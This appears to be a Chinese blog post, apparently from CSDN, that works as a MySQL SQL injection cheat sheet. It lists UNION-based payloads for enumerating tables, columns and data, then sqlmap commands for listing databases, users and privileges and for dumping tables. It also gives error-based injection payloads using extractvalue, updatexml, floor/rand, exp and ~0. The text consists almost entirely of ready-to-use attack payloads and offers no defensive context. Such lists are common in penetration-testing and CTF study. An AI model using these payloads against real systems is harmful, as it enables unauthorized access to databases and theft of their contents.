sql

mysql联合注入

group_concat('[',version(),'][',database(),'][',@@datadir,'][',current_user(),'][',user(),'][',system_user(),'][',@@version_compile_os,']')

查询表名:

union select group_concat(table_name) from information_schema.tables where table_schema=database()

查询列名:

union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='$table_name'

查询数据:

union select group_concat($column1,'---',$column2,'---',$column3) from $table_name

sqlmap

sqlmap -u '$url'
sqlmap -u '$url' --dbs
sqlmap -u '$url' --current-db
sqlmap -u '$url' -D '$database_name' --tables
sqlmap -u '$url' -D '$database_name' -T '$table_name' --columns
sqlmap -u '$url' -D '$database_name' -T '$table_name' -C '$column1,$column2,$column3' --dump
sqlmap -u '$url' -f
sqlmap -u '$url' -b
sqlmap -u '$url' --is-dba
sqlmap -u '$url' --users
sqlmap -u '$url' --current-user
sqlmap -u '$url' --privileges
sqlmap -u '$url' --roles

报错注入:

extractvalue()

and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+

updatexml()

and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+
and updatexml(1,concat(0x7e,(select @@version)),1)--+

floor(),rand()

union select count(*),1,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a%23

exp()

union select exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a)),2,3%23

~0

union select (!(select * from (select user())x) - ~0),2,3--+
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值